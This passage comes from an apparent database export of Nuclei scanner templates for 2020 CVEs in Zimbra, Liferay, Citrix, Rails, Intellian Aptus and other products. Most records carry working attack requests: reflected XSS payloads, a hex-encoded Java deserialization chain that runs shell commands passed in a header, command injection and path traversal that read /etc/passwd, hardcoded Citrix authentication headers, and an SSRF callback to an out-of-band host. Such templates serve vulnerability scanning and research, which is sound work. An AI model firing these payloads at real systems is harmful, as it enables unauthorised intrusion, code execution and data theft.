cve,cve2020,xss,mcafee\n\nhttp:\n - raw:\n - |\n GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"Policy Name\"\n - \"'\\\">\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202d1cb22987ed6f50f9a8450307b04fb97cb6b3c321c80b9f0488e23e96fcb37f02204df7d0479846817a8336b7fcafe8afda2777f7e03883335b649b88afa68341cc:922c64590222798bb761d5b6d8e72950", "hash": "075470d31a7eb3e1c2b6871d64a4572b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308236" }, "name": "CVE-2020-7796.yaml", 
"content": "id: CVE-2020-7796\n\ninfo:\n name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery\n author: gy741\n severity: critical\n description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability.\n reference:\n - https://www.adminxe.com/2183.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7796\n - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7796\n cwe-id: CWE-918\n epss-score: 0.70648\n epss-percentile: 0.9795\n cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: synacor\n product: zimbra_collaboration_suite\n tags: cve,cve2020,zimbra,ssrf,oast,synacor\n\nhttp:\n - raw:\n - |\n GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100c32049f90bd86f8d7752cf970acd2afd5150fb0a7d5ffd4b42477b733a9fdb0c022100ad42c6fbacd75f19232f08f7c3590d37f61dc7931ccc81dd74992232dd9633e3:922c64590222798bb761d5b6d8e72950", "hash": "a6b93f656bafaf2aeeb6d41ff235e917", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308237" }, "name": "CVE-2020-7943.yaml", "content": "id: CVE-2020-7943\n\ninfo:\n name: Puppet 
Server/PuppetDB - Sensitive Information Disclosure\n author: c-sh0\n severity: high\n description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB.\n remediation: |\n Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected.\n reference:\n - https://puppet.com/security/cve/CVE-2020-7943\n - https://tickets.puppetlabs.com/browse/PDB-4876\n - https://puppet.com/security/cve/CVE-2020-7943/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7943\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-7943\n cwe-id: CWE-276,NVD-CWE-noinfo\n epss-score: 0.08068\n epss-percentile: 0.93691\n cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: puppet\n product: puppet_enterprise\n tags: cve2020,cve,puppet,exposure,puppetdb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/metrics/v1/mbeans\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"trapperkeeper\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206792db6fdd8e464da8351b87ddbba9a963f88f46d4f033c091fe6c389244575d022100fba0ea89c7927a275a26e5c8af022bbc1396176d3062c626ebf54a7fd9215679:922c64590222798bb761d5b6d8e72950", "hash": "bae975c3a7363c9c67fa8ba0c3766b3c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308238" }, "name": "CVE-2020-7961.yaml", "content": "id: CVE-2020-7961\n\ninfo:\n name: Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: Liferay Portal prior to 7.2.1 
CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).\n remediation: |\n Upgrade Liferay Portal to version 7.2.1 CE GA2 or later to mitigate the vulnerability.\n reference:\n - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html\n - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html\n - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7961\n - http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7961\n cwe-id: CWE-502\n epss-score: 0.97342\n epss-percentile: 0.99876\n cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:*\n metadata:\n max-request: 2\n vendor: liferay\n product: liferay_portal\n tags: cve2020,cve,packetstorm,rce,liferay,kev\n\nhttp:\n - raw:\n - |\n POST /api/jsonws/invoke HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\n cmd2: {{command}}\n\n 
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E737
4616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E707574537
47265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n\n payloads:\n command:\n - \"systeminfo\" # Windows\n - \"lsb_release -a\" # Linux\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"OS Name:.*Microsoft Windows\"\n - \"Distributor ID:\"\n condition: or\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"Microsoft Windows (.*)\"\n - \"Distributor ID: (.*)\"\n part: body\n# digest: 4a0a00473045022071f597a8c75493532cfd3eaadfa6c8bbcaea6a87a45925358b9bcc0a50aa1d86022100c8b38b6ee54a0e95d8f18b3065c202b3f8f14b17ed17622dc24bb8b61577b3f5:922c64590222798bb761d5b6d8e72950", "hash": "fc02beb7486ca3deb807ef2a324144e0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308239" }, "name": "CVE-2020-7980.yaml", "content": "id: CVE-2020-7980\n\ninfo:\n name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution\n author: ritikchaddha\n severity: critical\n description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to 
the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7980\n - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html\n - https://github.com/Xh4H/Satellian-CVE-2020-7980\n - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html\n - https://github.com/0xT11/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7980\n cwe-id: CWE-78\n epss-score: 0.97015\n epss-percentile: 0.99726\n cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: intelliantech\n product: aptus_web\n shodan-query: http.title:\"Intellian Aptus Web\"\n tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n Cookie: ctr_t=0; sid=123456789\n\n {\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950", "hash": "51470ba17634ad4f78ad9ae5cd7419bd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823a" }, "name": "CVE-2020-8115.yaml", "content": "id: CVE-2020-8115\n\ninfo:\n name: Revive 
Adserver <=5.0.3 - Cross-Site Scripting\n author: madrobot,dwisiswant0\n severity: medium\n description: |\n Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.\n reference:\n - https://hackerone.com/reports/775693\n - https://www.revive-adserver.com/security/revive-sa-2020-001/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8115\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-8115\n cwe-id: CWE-79\n epss-score: 0.0187\n epss-percentile: 0.88123\n cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: revive-adserver\n product: revive_adserver\n tags: cve,cve2020,xss,hackerone,revive-adserver\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/www/delivery/afr.php?refresh=10000&\\\")',10000000);alert(1337);setTimeout('alert(\\\"\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - (?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502202281c77cd44460978380c0e81c7ecb788518a1ef2891f50395a869f5afffae68022100a72bc525d6b1e771166cc67870ec31fe56551193440b4622c8652b3c5510ff13:922c64590222798bb761d5b6d8e72950", "hash": "651eb069844413e8e608cf6b353b004d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823b" }, "name": "CVE-2020-8163.yaml", "content": "id: CVE-2020-8163\n\ninfo:\n name: Ruby on Rails <5.0.1 - Remote Code Execution\n author: tim_koopmans\n severity: high\n description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution.\n remediation: |\n Upgrade Ruby on Rails to version 5.0.1 or above.\n reference:\n - https://hackerone.com/reports/304805\n - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0\n - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8163\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8163\n cwe-id: CWE-94\n epss-score: 0.97016\n epss-percentile: 0.99691\n cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rubyonrails\n product: rails\n tags: cve,cve2020,rails,rce,hackerone,rubyonrails\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210095f2004035f79cbcb4af27718650ade78e8f25da899e3692309e6ddbcfe39faa022059a57f2c0fa7b3f659a52948e81555e06688f8163061909b9c5647d723f90de6:922c64590222798bb761d5b6d8e72950", "hash": "367f6d0489ebd2ae253515a13b5df806", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823c" }, 
"name": "CVE-2020-8191.yaml", "content": "id: CVE-2020-8191\n\ninfo:\n name: Citrix ADC/Gateway - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.\n reference:\n - https://support.citrix.com/article/CTX276688\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8191\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/jweny/pocassistdb\n - https://github.com/stratosphereips/nist-cve-search-tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-8191\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58959\n cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: application_delivery_controller_firmware\n tags: cve,cve2020,citrix,xss\n\nhttp:\n - raw:\n - |\n POST /menu/stapp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n X-NITRO-USER: xpyZxwy6\n\n sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022024dcfb977f8e9977d9363d303d40f2267b3a85036968987ab62443171eef46a4022100c4694949e1496753150bcac302501f45335d93836cd76f7569f8af58e2992340:922c64590222798bb761d5b6d8e72950", "hash": "679b0722c32f3ed7fcc1c97a9b2a629c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823d" }, "name": "CVE-2020-8193.yaml", "content": "id: CVE-2020-8193\n\ninfo:\n name: Citrix - Local File Inclusion\n author: pdteam\n severity: medium\n description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability.\n reference:\n - https://github.com/jas502n/CVE-2020-8193\n - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html\n - https://support.citrix.com/article/CTX276688\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8193\n - https://github.com/0ps/pocassistdb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-8193\n cwe-id: CWE-287,CWE-284\n epss-score: 0.97463\n epss-percentile: 0.99954\n cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 6\n vendor: citrix\n product: application_delivery_controller_firmware\n tags: cve2020,cve,citrix,lfi,kev,packetstorm\n\nhttp:\n - raw:\n - |\n POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n X-NITRO-USER: xpyZxwy6\n X-NITRO-PASS: xWXHUJ56\n\n 
\n - |\n GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /menu/neo HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /menu/stc HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n X-NITRO-USER: oY39DXzQ\n X-NITRO-PASS: ZuU9Y9c1\n rand_key: {{randkey}}\n\n \n - |\n POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n X-NITRO-USER: oY39DXzQ\n X-NITRO-PASS: ZuU9Y9c1\n rand_key: {{randkey}}\n\n \n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n extractors:\n - type: regex\n name: randkey # dynamic variable\n regex:\n - \"(?m)[0-9]{3,10}\\\\.[0-9]+\"\n internal: true\n part: body\n# digest: 4a0a0047304502200a40fbcd2be6f6e3f74c8672c222c2fb30213a6ad086641b213481f80ad09f66022100d1466bbe3255aaff3b150fda8bf77ec553d990b3079a9573e835cf7273d4accf:922c64590222798bb761d5b6d8e72950", "hash": "ee0a08357c14db6b2780252f2c15f0f3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823e" }, "name": "CVE-2020-8194.yaml", "content": "id: CVE-2020-8194\n\ninfo:\n name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection\n author: dwisiswant0\n severity: medium\n description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. 
Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.\n reference:\n - https://support.citrix.com/article/CTX276688\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8194\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-8194\n cwe-id: CWE-94\n epss-score: 0.90775\n epss-percentile: 0.98597\n cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: application_delivery_controller_firmware\n tags: cve,cve2020,citrix\n\nhttp:\n - raw:\n - |\n GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\n Host: {{Hostname}}\n Cookie: startupapp=st\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"application/x-java-jnlp-file\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210089b07a1f7f35dbfe8d692c1e503b6cc4ea0333448f26729c63bcd6c8860d3bbc022100ecfd9558b4925dcc29dc8e6cf9a52b94d26e455c4e3839af7357ebca2c68ce0d:922c64590222798bb761d5b6d8e72950", "hash": "4a95f49ff727bb4b1ba1cf88bdd62781", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823f" }, "name": "CVE-2020-8209.yaml", "content": "id: CVE-2020-8209\n\ninfo:\n name: Citrix XenMobile Server - Local File Inclusion\n author: dwisiswant0\n severity: high\n description: |\n Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.\n reference:\n - 
https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/\n - https://support.citrix.com/article/CTX277457\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8209\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by Citrix to fix the vulnerability.\n reference:\n - https://support.citrix.com/article/CTX277457\n - https://github.com/Miraitowa70/POC-Notes\n - https://github.com/dudek-marcin/Poc-Exp\n - https://github.com/hectorgie/PoC-in-GitHub\n - https://github.com/pen4uin/vulnerability-research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-8209\n cwe-id: CWE-22\n epss-score: 0.96834\n epss-percentile: 0.9967\n cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: xenmobile_server\n tags: cve2020,cve,citrix,lfi,xenmobile\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"fileDownload=true\"\n - \"application/octet-stream\"\n - \"attachment;\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502207857cb1944dd9e2083f4df982605d1dbcef6f8390d03106a23e982a29aed788f022100c410e96420e23c27071667a13d2d97f7f3f3676beb53a025e0ef3db9a599c5c0:922c64590222798bb761d5b6d8e72950", "hash": "f7f49a9481f7d267329c0fc0b1213a0a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308240" }, "name": "CVE-2020-8497.yaml", "content": "id: CVE-2020-8497\n\ninfo:\n name: Artica Pandora FMS <=7.42 - Arbitrary File Read\n author: gy741\n severity: medium\n description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. 
An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.\n remediation: |\n Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.\n reference:\n - https://k4m1ll0.com/cve-2020-8497.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8497\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-8497\n cwe-id: CWE-306\n epss-score: 0.002\n epss-percentile: 0.56881\n cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: artica\n product: pandora_fms\n tags: cve,cve2020,fms,artica\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"type\"'\n - '\"id_user\"'\n - '\"user_name\"'\n - '\"text\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100af1818c7f41234374edabf5cb8c41a1f1f2b0006f1ad792cc58aa2617de103160220625f87c03f8a6d85ac8db0b8598f26a7b1324d62edd1e9420071b0d8c83e2610:922c64590222798bb761d5b6d8e72950", "hash": "72f80a8dae689fe6746acc7b5b4123d4", "level": 4, 